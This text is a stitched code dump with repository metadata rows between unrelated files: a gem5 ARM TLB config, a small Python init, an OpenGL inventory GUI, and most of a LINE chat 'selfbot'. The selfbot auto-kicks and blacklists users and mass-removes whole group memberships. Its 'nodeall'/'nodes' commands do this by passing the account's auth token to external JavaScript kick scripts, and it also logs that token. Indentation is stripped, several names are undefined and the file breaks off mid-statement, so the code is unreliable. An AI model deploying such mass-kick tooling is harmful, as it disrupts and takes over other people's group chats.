# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
from m5.SimObject import SimObject
from m5.params import *
from m5.proxy import *
from MemObject import MemObject
# Basic stage 1 translation objects
class ArmTableWalker(MemObject):
type = 'ArmTableWalker'
cxx_class = 'ArmISA::TableWalker'
cxx_header = "arch/arm/table_walker.hh"
is_stage2 = Param.Bool(False, "Is this object for stage 2 translation?")
num_squash_per_cycle = Param.Unsigned(2,
"Number of outstanding walks that can be squashed per cycle")
# The port to the memory system. This port is ultimately belonging
# to the Stage2MMU, and shared by the two table walkers, but we
# access it through the ITB and DTB walked objects in the CPU for
# symmetry with the other ISAs.
port = MasterPort("Port used by the two table walkers")
sys = Param.System(Parent.any, "system object parameter")
class ArmTLB(SimObject):
type = 'ArmTLB'
cxx_class = 'ArmISA::TLB'
cxx_header = "arch/arm/tlb.hh"
sys = Param.System(Parent.any, "system object parameter")
size = Param.Int(64, "TLB size")
walker = Param.ArmTableWalker(ArmTableWalker(), "HW Table walker")
is_stage2 = Param.Bool(False, "Is this a stage 2 TLB?")
# Stage 2 translation objects, only used when virtualisation is being used
class ArmStage2TableWalker(ArmTableWalker):
is_stage2 = True
class ArmStage2TLB(ArmTLB):
size = 32
walker = ArmStage2TableWalker()
is_stage2 = True
class ArmStage2MMU(SimObject):
type = 'ArmStage2MMU'
cxx_class = 'ArmISA::Stage2MMU'
cxx_header = 'arch/arm/stage2_mmu.hh'
tlb = Param.ArmTLB("Stage 1 TLB")
stage2_tlb = Param.ArmTLB("Stage 2 TLB")
sys = Param.System(Parent.any, "system object parameter")
class ArmStage2IMMU(ArmStage2MMU):
# We rely on the itb being a parameter of the CPU, and get the
# appropriate object that way
tlb = Parent.itb
stage2_tlb = ArmStage2TLB()
class ArmStage2DMMU(ArmStage2MMU):
# We rely on the dtb being a parameter of the CPU, and get the
# appropriate object that way
tlb = Parent.dtb
stage2_tlb = ArmStage2TLB()
| 42.32
| 77
| 0.750709
|
7bfc9ca131c13653d0ed2f1b3ff098871c043914
| 101
|
py
|
Python
|
wiretap/__init__.py
|
karthicraghupathi/django_rapyd_wiretap
|
9382d6e2e3d719e9635eb6300f0f224c69aee40d
|
[
"Apache-2.0"
] | null | null | null |
wiretap/__init__.py
|
karthicraghupathi/django_rapyd_wiretap
|
9382d6e2e3d719e9635eb6300f0f224c69aee40d
|
[
"Apache-2.0"
] | null | null | null |
wiretap/__init__.py
|
karthicraghupathi/django_rapyd_wiretap
|
9382d6e2e3d719e9635eb6300f0f224c69aee40d
|
[
"Apache-2.0"
] | 1
|
2022-03-10T15:41:10.000Z
|
2022-03-10T15:41:10.000Z
|
__version__ = "0.0.5"
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
| 16.833333
| 61
| 0.782178
|
67e1c641c06f51b8a9f9b4d0adbbc71d4889beb3
| 1,935
|
py
|
Python
|
gui/invRender.py
|
C1ffisme/pyopengl-sandbox
|
38b07ef50e7642be44a571a8768aa4ac749bde89
|
[
"MIT"
] | 4
|
2018-07-03T16:51:17.000Z
|
2021-12-10T09:18:56.000Z
|
gui/invRender.py
|
C1ffisme/pyopengl-sandbox
|
38b07ef50e7642be44a571a8768aa4ac749bde89
|
[
"MIT"
] | null | null | null |
gui/invRender.py
|
C1ffisme/pyopengl-sandbox
|
38b07ef50e7642be44a571a8768aa4ac749bde89
|
[
"MIT"
] | 1
|
2021-12-10T08:47:53.000Z
|
2021-12-10T08:47:53.000Z
|
import numpy
import math
import inventory
def create_inventory(width, height, display, inv=[]):
gui_height = 0.7
gui_width = 0.7
gui_v = numpy.array([-gui_width,-gui_height,0.1, -gui_width, gui_height,0.1, gui_width,-gui_height,0.1, -gui_width,gui_height,0.1, gui_width,-gui_height,0.1, gui_width,gui_height,0.1], numpy.float32)
gui_c = numpy.array([0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4], numpy.float32)
slot_size = 0.2
margin_size = 0.1
half_height = float(height)/2.0
half_width = float(width)/2.0
flo_h = math.floor(half_height)
flo_w = math.floor(half_width)
if flo_h == 0:
flo_h = 1
if flo_w == 0:
flo_w = 1
inv_x = 0
for row in range(-int(math.floor(half_height)), int(math.ceil(half_height))):
inv_y = 0
for column in range(-int(math.floor(half_width)), int(math.ceil(half_width))):
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w,(gui_height-margin_size)*(row)/flo_h,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w + slot_size,(gui_height-margin_size)*(row)/flo_h,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w,(gui_height-margin_size)*(row)/flo_h + slot_size,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w + slot_size,(gui_height-margin_size)*(row)/flo_h + slot_size,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w + slot_size,(gui_height-margin_size)*(row)/flo_h,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w,(gui_height-margin_size)*(row)/flo_h + slot_size,0])
if inv == []:
gui_c = numpy.append(gui_c, [0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7])
else:
for i in range(0,6):
gui_c = numpy.append(gui_c, [inventory.get_inv_image(inv[inv_x][inv_y][0])])
inv_y += 1
inv_x += 1
return gui_v, gui_c
| 37.211538
| 201
| 0.672351
|
745fbbb997cacde727d1f60dda52ee65279e7072
| 61,247
|
py
|
Python
|
Classclient.py
|
ehunaj/cl1
|
c9054d34177070c2c43d65c4eee553271decbe13
|
[
"BSD-3-Clause"
] | null | null | null |
Classclient.py
|
ehunaj/cl1
|
c9054d34177070c2c43d65c4eee553271decbe13
|
[
"BSD-3-Clause"
] | null | null | null |
Classclient.py
|
ehunaj/cl1
|
c9054d34177070c2c43d65c4eee553271decbe13
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Support ===ZNF TEAM BOTZ===
from Dit.linepy import *
from akad.ttypes import *
import time, asyncio, json, threading, codecs, sys, os, re, urllib, requests,subprocess,traceback,random
from Naked.toolshed.shell import execute_js
from bs4 import BeautifulSoup
creator = ["u9d79f5031bc4c73a5054aa8b26c9d0c2"]
helpMessage ="""
_.key_
_.add owner_
_.del owner_
_.add admin_
_.del admin_
_.add staff_
_.del staff_
_.cban_
_.autojoin on:off_
_.add on:off_
_.kick @_
_.sp_
_.runtime_
_.bye_
_.rechat_
"""
with open('pro.json', 'r') as fp:
pro = json.load(fp)
with open('org.json', 'r') as fp:
org = json.load(fp)
with open('wait2.json', 'r') as fp:
wait2 = json.load(fp)
mulai = time.time()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def logError(text):
cl.log("[ ERROR ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","?","???:","???:","????","????"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes._from = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
class LineBot(object):
def __init__(self, resp, authQR=None):
self.resp = resp
self.resp = self.resp+' '
self.authQR = authQR
self.login(authQR)
self.fetch()
def AutoSave(self,op):
msg = op.message
self.client.unsend2(msg,self.wait)
self.client.fancyfancy(self.wait)
with open(self.anus, 'w') as fp:
json.dump(self.wait, fp, sort_keys=True, indent=4, ensure_ascii=False)
def login(self, auth):
if auth == None:
self.client = LINE()
else:
self.client = LINE(auth)
self.client.log("Auth Token : " + str(self.client.authToken))
self.mid = self.client.getProfile().mid
def fetch(self):
while True:
try:
self.operations = self.client.poll.fetchOperations(self.client.revision, 50)
for op in self.operations:
if (op.type != OpType.END_OF_OPERATION):
self.client.revision = max(self.client.revision, op.revision)
self.bot(op)
self.AutoSave(op)
except:
pass
def bot(self, op):
cl = self.client
wait = wait2
try:
if op.type == 0 or op.type == 50:
return
if op.type == 13:
if self.mid in op.param3:
if wait2["autoJoin"] == True:
if op.param2 not in creator and op.param2 not in org["owner"]:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"hi mem " + str(ginfo.name))
cl.sendMessage(op.param1,"Bukan Owner ia... Balik lagi ah??\nn Bye..")
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
cl.getGrpup(op.param1)
if op.param3 in org["owner"] and op.param3 in creator and op.param3 in org["admin"] and op.param3 in org["staff"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w',) as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
cl.cancelGroupInvitation(op.param1,[op.param2])
if self.mid in op.param3:
if op.param2 in org["owner"] or op.param2 in org["staff"]:
cl.acceptGroupInvitation(op.param1)
if op.type == 13:
if op.param2 in wait2["blacklist"]:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.cancelGroupInvitation(op.param1,[op.param3])
except:
pass
if op.param1 in pro["Proinvite"]:
if op.param2 in creator or op.param2 in org["owner"] or op.param2 in org["admin"] or op.param2 in org["staff"]:
pass
else:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
group = cl.getContact(op.param3)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
if _mid in op.param3:
cl.cancelGroupInvitation(op.param1,[_mid])
if op.type == 13:
if op.param3 in wait2["blacklist"]:
if op.param2 in creator or op.param2 in org["owner"] or op.param2 in org["admin"] or op.param2 in org["staff"]:
pass
else:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 19:
if op.param1 in pro["Autokick"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param3 not in wait2["blacklist"]:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in creator:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.acceptGroupInvitation(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in org["owner"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.acceptGroupInvitation(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in org["admin"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in org["staff"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.type == 0:
return
if op.type == 5:
cl.findAndAddContactsByMid(op.param1)
if(wait2["message"]in[""," ","\n",None]):
pass
else:
cl.sendMessage(op.param1,str(wait2["message"]))
if op.type == 15:
if op.param1 in wait2["bymsg"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
return
else:
cl.sendText(op.param1, wait2["leftmsg"])
print ("MEMBER HAS LEFT THE GROUP")
if op.type == 17:
if op.param2 in wait2["blacklist"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 32:
if op.param1 in pro["Procancel"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param3 not in wait2["blacklist"]:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if wait2["Jscancel"] == True:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
user = cl.getContact(op.param2)
cl.sendMessage(op.param2,"jangan di cancel woooii.. " + str(user.displayName))
try:
if op.param3 in org["owner"]:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 in creator:
cl.inviteIntoGroup(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 11:
if op.param1 in pro["Proqr"]:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.reissueGroupTicket(op.param1)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait2["blacklist"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
cl.reissueGroupTicket(op.param1)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 11:
if op.param1 in pro["Proname"]:
if op.param2 in creator or op.param2 in org["owner"] or op.param2 in org["admin"] or op.param2 in org["staff"]:
pass
else:
g = cl.getGroup(op.param1)
g.name = pro["gname"][op.param1]
cl.updateGroup(g)
if op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 and msg.toType == 2:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if text is None:
return
if msg.contentType == 13:
if msg._from in creator:
if wait2["addowner"] == True:
if msg.contentMetadata["mid"] in org["owner"]:
cl.sendMessage(msg.to, "was owner")
else:
org["owner"][msg.contentMetadata["mid"]] = True
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to, "owner added")
if msg.contentType == 13:
if msg._from in creator:
if wait2["delowner"] == True:
if msg.contentMetadata["mid"] in org["owner"]:
del org["owner"][msg.contentMetadata["mid"]]
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Owner deleted")
else:
cl.sendMessage(msg.to,"Owner not found")
#===[ Add admin ☆☆☆ ]
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"]:
if wait2["addadmin"]==True:
if msg.contentMetadata["mid"] in org["admin"]:
cl.sendMessage(msg.to, "was admin")
wait2["addadmin"]=False
else:
org["admin"][msg.contentMetadata["mid"]] = True
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to, "admin added")
wait2["addadmin"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"]:
if wait2["deladmin"]==True:
if msg.contentMetadata["mid"] in org["admin"]:
del org["admin"][msg.contentMetadata["mid"]]
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
wait2["deladmin"]=False
cl.sendMessage(msg.to,"s deleted")
else:
cl.sendMessage(msg.to,"S not found")
#====[ Add staff ☆☆☆ ]
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["addstaff"]==True:
if msg.contentMetadata["mid"] in org["staff"]:
cl.sendMessage(msg.to, "was staff")
wait2["addstaff"]=False
else:
org["staff"][msg.contentMetadata["mid"]] = True
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to, "staff added")
wait2["addstaff"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["delstaff"]==True:
if msg.contentMetadata["mid"] in org["staff"]:
del org["staff"][msg.contentMetadata["mid"]]
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"staff deleted")
wait2["delstaff"]=False
else:
cl.sendMessage(msg.to,"Staff not found")
wait2["delstaff"]=False
#========[ BLACKLIST ]============#
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["ablacklist"]==True:
if msg.contentMetadata["mid"] in wait2["blacklist"]:
cl.sendMessage(to, "Was BL boss")
wait2["ablacklist"]=False
else:
wait2["blacklist"][msg.contentMetadata["mid"]] = True
with open('wait2.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendMessage(to, "Blacklist Saved")
wait2["ablacklist"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["dblacklist"]==True:
if msg.contentMetadata["mid"] in wait2["blacklist"]:
del wait2["blacklist"][msg.contentMetadata["mid"]]
with open('wait2.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendMessage(to, "Blacklist Removed")
wait2["dblacklist"]=False
else:
cl.sendMessage(to," target not found")
wait2["dblacklist"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["Invi"] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendMessage(msg.to,"-> " + _name + " was here")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendMessage(msg.to,"Done Invite : " + _name)
if op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 and msg.toType == 2:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 7:
pass
elif text is None:
return
elif msg.toType == 2:
if msg.text == self.resp + "help":
if msg._from in creator:
cl.sendMessage(msg.to,helpMessage)
if msg.text in [".key owner"]:
if msg._from in creator or msg._from in org["owner"]:
cl.sendMessage(msg.to,helpMessage1)
if msg.text in [".key admin"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
cl.sendMessage(msg.to,helpMessage2)
elif msg.text in [".reboot"]:
if msg._from in creator:
print ("[Command]Like executed")
try:
cl.sendMessage(msg.to,"Restarting...")
restart_program()
except:
cl.sendMessage(msg.to,"Please wait")
restart_program()
pass
elif msg.text in [".absen"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
cl.sendMessage(msg.to, "stay...")
elif msg.text == self.resp + "key":
if msg._from in creator or msg._from in org["owner"]:
md = " _[] ?? []_\n\n"
md += "" +self.resp+ " key\n"
md += "" +self.resp+ " owner\n"
md += "" +self.resp+ " admin\n"
md += "" +self.resp+ " staff\n"
md += "" +self.resp+ " banlist\n"
md += "" +self.resp+ " kick\n"
md += "" +self.resp+ " cancel\n"
md += "" +self.resp+ " ourl\n"
md += "" +self.resp+ " curl\n"
md += "" +self.resp+ " grupset\n"
md += "" +self.resp+ " grup\n"
md += "" +self.resp+ " invite\n"
md += "" +self.resp+ " inv to\n"
md += "" +self.resp+ " bye\n"
md += "" +self.resp+ " left in\n"
md += "" +self.resp+ " ct\n"
md += "" +self.resp+ " mid\n\n"
md += " _[] ?? []_"
cl.sendMessage(msg.to,md)
elif self.resp + "ct @" in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = cl.getContact(ls)
mi_d = contact.mid
cl.sendContact(msg.to, mi_d)
elif self.resp + "cn " in msg.text:
if msg._from in creator:
x = cl.getProfile()
x.displayName = msg.text.replace("cn ","")
cl.updateProfile(x)
cl.sendMessage(msg.to, " done")
elif msg.text in [".runtime"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
eltime = time.time() - mulai
van = "Bot run "+waktu(eltime)
cl.sendMessage(msg.to,van)
elif msg.text == self.resp + "ourl":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
X = cl.getGroup(msg.to)
if X.preventedJoinByTicket == False:
cl.updateGroup(X)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to,"line://ti/g/" + gurl)
else:
X.preventedJoinByTicket = False
cl.updateGroup(X)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to,"line://ti/g/" + gurl)
elif msg.text == self.resp + "curl":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
X = cl.getGroup(msg.to)
if X.preventedJoinByTicket == True:
cl.sendMessage(msg.to,"qr was close")
else:
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to,"done..")
elif self.resp + "mid @" in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
try:
cl.sendMessage(msg.to,str(mention['M']))
except Exception as e:
pass
elif ".kick " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["admin"] or target in org["staff"]:
pass
else:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
elif msg.text == self.resp + "nodeall":
if msg._from in creator:
cmd = 'kickall.js gid={} token={}'.format(receiver, cl.authToken)
group = cl.getGroup(receiver)
members = [o.mid for o in group.members if o.mid not in creator and o.mid not in org["owner"] and o.mid not in org["admin"] and o.mid not in org["staff"]]
for invitees in group.invitee:
for o in group.members:
if invitees.mid not in org["owner"]:
if o.mid not in org["owner"]:
cmd += ' uid={}'.format(invitees.mid)
cmd += ' uid={}'.format(o.mid)
print(cmd)
success = execute_js(cmd)
elif msg.text == self.resp + "nodes":
if msg._from in creator:
cmd = 'nook.js gid={} token={}'.format(to, cl.authToken)
group = cl.getGroup(to)
for a in creator:
cl.sendMessage(a, "im has been used js from group %s" %group.name)
members = [o.mid for o in group.members if o.mid not in creator and o.mid not in org["owner"] and o.mid not in org["admin"] and o.mid not in org["staff"]]
for o in group.members:
if o.mid not in creator and o.mid not in org["staff"]:
cmd += ' uid={}'.format(o.mid)
print(cmd)
success = execute_js(cmd)
elif self.resp + "kick " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["admin"] or target in org["staff"]:
pass
else:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
elif msg.text in [".bot cancel"]:
if msg._from in creator or msg._from in org["owner"]:
group = cl.getGroup(msg.to)
if group.invitee is None:
cl.sendMessage(op.message.to, " gada pendingan bos..")
else:
nama = [contact.mid for contact in group.invitee]
for x in nama:
if x not in org["owner"]:
cl.cancelGroupInvitation(msg.to, [x])
time.sleep(0.3)
cl.sendMessage(msg.to, "done.")
elif msg.text == self.resp + "cancel":
if msg._from in creator or msg._from in org["owner"]:
group = cl.getGroup(msg.to)
if group.invitee is None:
cl.sendMessage(op.message.to, "gada pendingan bos..")
else:
nama = [contact.mid for contact in group.invitee]
for x in nama:
if x not in org["owner"]:
cl.cancelGroupInvitation(msg.to, [x])
time.sleep(0.3)
cl.sendMessage(to, "done.")
elif msg.text == self.resp + "grup":
if msg._from in creator:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
gn = cl.getGroup(i).name
h += " %s\n" % (gn)
cl.sendMessage(msg.to,"My grup \n"+ h)
elif self.resp + "inv to " in msg.text:
if msg._from in creator:
ng = msg.text.replace("inv to ","")
gid = cl.getGroupIdsJoined()
x = msg._from
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.inviteIntoGroup(i,[x])
cl.sendMessage(msg.to,"Success join to ["+ h +"] group")
else:
pass
elif self.resp + "leave grup " in msg.text:
if msg._from in creator:
ng = msg.text.replace("leave grup ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendMessage(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
cl.sendMessage(msg.to,"Success left ["+ h +"] group")
else:
pass
elif msg.text in [".out all grup"]:
if msg._from in creator:
gid = ki.getGroupIdsJoined()
for i in gid:
cl.sendMessage(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
cl.sendMessage(msg.to,"Success left all group")
elif msg.text == self.resp + "invite on":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["Invi"] == False:
wait2["Invi"] = True
cl.sendMessage(msg.to, "send contact auto Invite on")
elif msg.text == self.resp + "invite off":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["Invi"] == True:
wait2["Invi"] = False
cl.sendMessage(msg.to, "auto Invite off")
elif msg.text in [".kickall"]:
if msg._from in creator or msg._from in org["owner"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
for x in nama:
if x not in creator:
if x not in org["owner"]:
if x not in org["admin"]:
if x not in org["staff"]:
try:
cl.kickoutFromGroup(msg.to,[x])
except:
pass
elif msg.text in [".autojoin on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=True
cl.sendMessage(msg.to,"Auto join in Activated")
elif msg.text in [".autojoin off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=False
cl.sendMessage(msg.to,"Auto join not Active")
elif msg.text in [".bye"]:
if msg._from in creator or msg._from in org["owner"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif msg.text == self.resp + "bye":
if msg._from in creator or msg._from in org["owner"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in [".add owner on"]:
if msg._from in creator:
if wait2["addowner"] == False:
wait2["addowner"] = True
cl.sendMessage(msg.to, "Please send Contact for add")
else:
cl.sendMessage(msg.to, "send Contact for add")
elif msg.text in [".add owner off"]:
if msg._from in creator:
if wait2["addowner"] == True:
